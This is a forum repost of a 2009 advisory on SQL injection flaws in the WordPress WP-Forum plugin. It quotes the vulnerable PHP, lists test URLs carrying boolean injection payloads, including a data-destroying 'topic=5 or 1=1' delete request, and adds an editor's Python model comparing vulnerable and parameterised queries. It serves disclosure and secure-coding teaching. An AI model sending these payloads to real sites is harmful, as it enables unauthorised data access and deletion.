鸡春 posted on 2010-1-24 17:27:54

WordPress WP-Forum plugin: multiple SQL injection vulnerabilities

SSV ID: 15131
SEBUG-Appdir: WordPress
Published: 2009-12-16
Affected versions:
Fredrik Fahlstad WP-Forum <= 2.3

Vulnerability description:
BUGTRAQ ID: 37357
CVE ID: CVE-2009-3703

WP-Forum is a PHP-based WordPress plugin.

WP-Forum's wpf.class.php does not properly sanitize the user-supplied forum, topic and search_max parameters, nor the id parameter submitted in the editpost and viewtopic actions; each value is concatenated directly into an SQL statement. A remote attacker can therefore perform SQL injection by submitting crafted parameters. The vulnerable code segments follow:

In wpf.class.php:

1836   $option_max_days = $_POST['search_max'];       // <- this line is not being sanitized
1837   $option_forums = $_POST['forum'];
1838   if(!$option_max_days)
1839            $option_max_days = 9999;
1840   $op .= " AND $this->t_posts.`date` > SUBDATE(CURDATE(), INTERVAL $option_max_days DAY) ";
1841
...
1850   foreach((array)$option_forums as $f)
1851             $a .= $f.",";    // <- this line is not being sanitized
1852
1853   $a = substr($a, 0, strlen($a)-1 );
1854   if(!$a)
1855             $w = "";
1856   else
1857             $w = "IN($a)";
1858
1859   $sql = "SELECT $this->t_threads.parent_id as pt, $this->t_posts.id, text, $this->t_posts.subject, $this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST ('$search_string') AS score
1860   FROM $this->t_posts inner join $this->t_threads on $this->t_posts.parent_id = $this->t_threads.id
1861   WHERE $this->t_threads.parent_id$w
1862   AND MATCH (text) AGAINST ('$search_string') $op";

In wpf-post.php:

57   $id = $_GET['id']; // <- $_GET['id'] is directly assigned
58   $thread = $this->check_parms($_GET['t']);
59
60             $out .= $this->header();
61
62   $post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE id = $id"); // <- id is used without clean up

Other examples:

1490   function remove_post(){
1491             global $user_level, $user_ID, $wpdb;
1492             $id = $_GET['id']; // <- $_GET['id'] is directly assigned
1493             $author = $wpdb->get_var("SELECT author_id from $this->t_posts where id = $id"); // <- id is used without clean up
...
1503             if($del == "ok"){
1504               $wpdb->query("DELETE FROM $this->t_posts WHERE id = $id"); // <- id is used without clean up
1505               $this->o .= "<div class='updated'>".__("Post deleted", "wpforum")."</div>";
1506             }
1507             else
1508               wp_die(__("Cheating, are we?", "wpforum"));
1509
1510   }

In addition, because $_GET['topic'] is not filtered before it is concatenated into the two DELETE statements, a request that passes the is_moderator() check can wipe every record in the $this->t_posts and $this->t_threads tables:

1479   function remove_topic(){
1480             global $user_level, $user_ID, $wpdb;
1481             $topic = $_GET['topic'];
1482             if($this->is_moderator($user_ID, $this->current_forum)){
1483               $wpdb->query("DELETE FROM $this->t_posts WHERE parent_id = $topic");
1484               $wpdb->query("DELETE FROM $this->t_threads WHERE id = $topic");
1485             }
1486             else
1487               wp_die(__("Cheating, are we?", "wpforum"));
1488
1489   }

References:
Credit: Juan Galiana Lara (jgaliana@isecauditors.com)
Links: http://secunia.com/advisories/37794/
http://marc.info/?l=bugtraq&m=126098010402950&w=2
Test method:

The programs (methods) provided by this site may be offensive in nature and are provided for security research and teaching only; use at your own risk!

Each pair of URLs below differs only in the appended condition (1=0 versus 1=1). On a vulnerable install the two responses differ, because the condition is evaluated inside the query rather than treated as part of the id or topic value. Note that the delete_topic requests are destructive: in the remove_topic() code above, topic=5 or 1=1 deletes every row in t_posts and t_threads once is_moderator() passes, so run them only against a test install.

http://www.example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0
http://www.example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0
http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0
http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1
http://www.example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0
http://www.example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1
http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1

SEBUG security recommendation:
Vendor patch:

Fredrik Fahlstad
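Worked example, added by the editor (it is not code from the WP-Forum plugin, the advisory, or its author): the three query shapes from the advisory, the id lookup in wpf-post.php, the two DELETEs in remove_topic(), and the IN(...) list built from forum[], modelled in Python against an in-memory SQLite database, each beside a hardened form that validates the value as an integer and binds it as a parameter. Table and column names follow the advisory (t_posts, t_threads, id, parent_id, author_id, text); the row contents are constructed sample data; the MySQL-only SUBDATE(CURDATE(), INTERVAL ... DAY) clause on search_max is not modelled.

```python
"""Model of WP-Forum's string-built queries against in-memory SQLite.
Editor's example, not the plugin's code. Table/column names follow the
advisory; SAMPLE_* rows are constructed test data."""
import sqlite3

# Constructed sample data: threads are (id, forum), posts are
# (id, thread, author_id, text).
SAMPLE_THREADS = [(1, 1), (2, 1), (3, 2)]
SAMPLE_POSTS = [(1, 1, 7, "first"), (2, 1, 8, "second"),
                (3, 2, 7, "third"), (4, 2, 9, "fourth"),
                (5, 3, 8, "fifth"), (6, 3, 9, "sixth")]


def fresh_db():
    """Create and populate a throwaway database for one scenario."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE t_threads (id INTEGER PRIMARY KEY, parent_id INTEGER);
        CREATE TABLE t_posts (id INTEGER PRIMARY KEY, parent_id INTEGER,
                              author_id INTEGER, text TEXT);
    """)
    db.executemany("INSERT INTO t_threads VALUES (?, ?)", SAMPLE_THREADS)
    db.executemany("INSERT INTO t_posts VALUES (?, ?, ?, ?)", SAMPLE_POSTS)
    return db


def count_rows(db, table):
    return db.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]


# ---- vulnerable shape: the request value is spliced into the SQL text ----
def vuln_get_post(db, post_id):
    """Mirrors wpf-post.php: $_GET['id'] concatenated into the SELECT."""
    return db.execute(f"SELECT * FROM t_posts WHERE id = {post_id}").fetchone()


def vuln_remove_topic(db, topic):
    """Mirrors remove_topic(): $_GET['topic'] concatenated into two DELETEs."""
    db.execute(f"DELETE FROM t_posts WHERE parent_id = {topic}")
    db.execute(f"DELETE FROM t_threads WHERE id = {topic}")


def vuln_threads_in_forums(db, forums):
    """Mirrors the search code: forum[] values joined with commas into IN()."""
    in_list = ",".join(str(f) for f in forums)
    sql = f"SELECT id FROM t_threads WHERE parent_id IN({in_list}) ORDER BY id"
    return [row[0] for row in db.execute(sql)]


# ---- hardened shape: validate as an integer, then bind as a parameter ----
def as_int(value):
    """Return the value as an int, or None if it is not a bare integer."""
    try:
        return int(str(value).strip())
    except ValueError:
        return None


def safe_get_post(db, post_id):
    n = as_int(post_id)
    if n is None:
        return None                      # "1 and 1=1" is rejected outright
    return db.execute("SELECT * FROM t_posts WHERE id = ?", (n,)).fetchone()


def safe_remove_topic(db, topic):
    """Return True if the deletes ran, False if the input was rejected."""
    n = as_int(topic)
    if n is None:
        return False
    db.execute("DELETE FROM t_posts WHERE parent_id = ?", (n,))
    db.execute("DELETE FROM t_threads WHERE id = ?", (n,))
    return True


def safe_threads_in_forums(db, forums):
    ids = [as_int(f) for f in forums]
    if not ids or any(i is None for i in ids):
        return []                        # one bad element rejects the list
    placeholders = ",".join("?" * len(ids))   # one ? per forum id
    sql = f"SELECT id FROM t_threads WHERE parent_id IN({placeholders}) ORDER BY id"
    return [row[0] for row in db.execute(sql, ids)]


if __name__ == "__main__":
    db = fresh_db()
    # The boolean oracle used by the advisory's test URLs: only the
    # "and 1=1" variant returns the row.
    print(vuln_get_post(db, "1 and 1=1"), vuln_get_post(db, "1 and 1=0"))
    # topic=5 or 1=1 empties both tables through the vulnerable path.
    vuln_remove_topic(db, "5 or 1=1")
    print(count_rows(db, "t_posts"), count_rows(db, "t_threads"))
```

The WordPress equivalent of the safe_* functions is to cast with intval() and pass the value through $wpdb->prepare(), e.g. $wpdb->prepare("SELECT * FROM $wpforum->t_posts WHERE id = %d", $id); for the forum list, build the placeholder string with implode(',', array_fill(0, count($ids), '%d')) and pass the validated ids as the remaining prepare() arguments. Binding alone would already neutralise the "5 or 1=1" payload, since it is then compared as a literal rather than parsed as SQL; the integer check on top turns a silent no-op into an explicit rejection that can be logged.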